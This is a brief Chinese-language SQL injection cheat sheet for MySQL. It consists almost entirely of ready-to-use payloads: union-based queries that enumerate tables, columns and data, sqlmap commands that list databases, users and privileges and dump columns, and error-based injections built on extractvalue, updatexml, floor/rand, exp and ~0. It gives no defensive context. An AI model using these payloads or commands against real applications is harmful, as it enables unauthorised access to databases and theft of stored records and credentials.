mysql联合注入
group_concat('[',version(),'][',database(),'][',@@datadir,'][',current_user(),'][',user(),'][',system_user(),'][',@@version_compile_os,']')
查询表名:
union select group_concat(table_name) from information_schema.tables where table_schema=database()
查询列名:
union select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='$table_name'
查询数据:
union select group_concat($column1,'---',$column2,'---',$column3) from $table_name
sqlmap
sqlmap -u '$url'
sqlmap -u '$url' --dbs
sqlmap -u '$url' --current-db
sqlmap -u '$url' -D '$database_name' --tables
sqlmap -u '$url' -D '$database_name' -T '$table_name' --columns
sqlmap -u '$url' -D '$database_name' -T '$table_name' -C '$column1,$column2,$column3' --dump
sqlmap -u '$url' -f
sqlmap -u '$url' -b
sqlmap -u '$url' --is-dba
sqlmap -u '$url' --users
sqlmap -u '$url' --current-user
sqlmap -u '$url' --privileges
sqlmap -u '$url' --roles
报错注入:
extractvalue()
and extractvalue(1,concat('~',(select group_concat(table_name) from information_schema.tables where table_schema=database())))--+
updatexml()
and updatexml(1,concat('~',(select group_concat(table_name) from information_schema.tables where table_schema=database())),1)--+
and updatexml(1,concat(0x7e,(select @@version)),1)--+
floor(),rand()
union select count(*),1,concat((select table_name from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2))a from information_schema.tables group by a%23
exp()
union select exp(~(select * from (select table_name from information_schema.tables where table_schema=database() limit 0,1)a)),2,3%23
~0
union select (!(select * from (select user())x) - ~0),2,3--+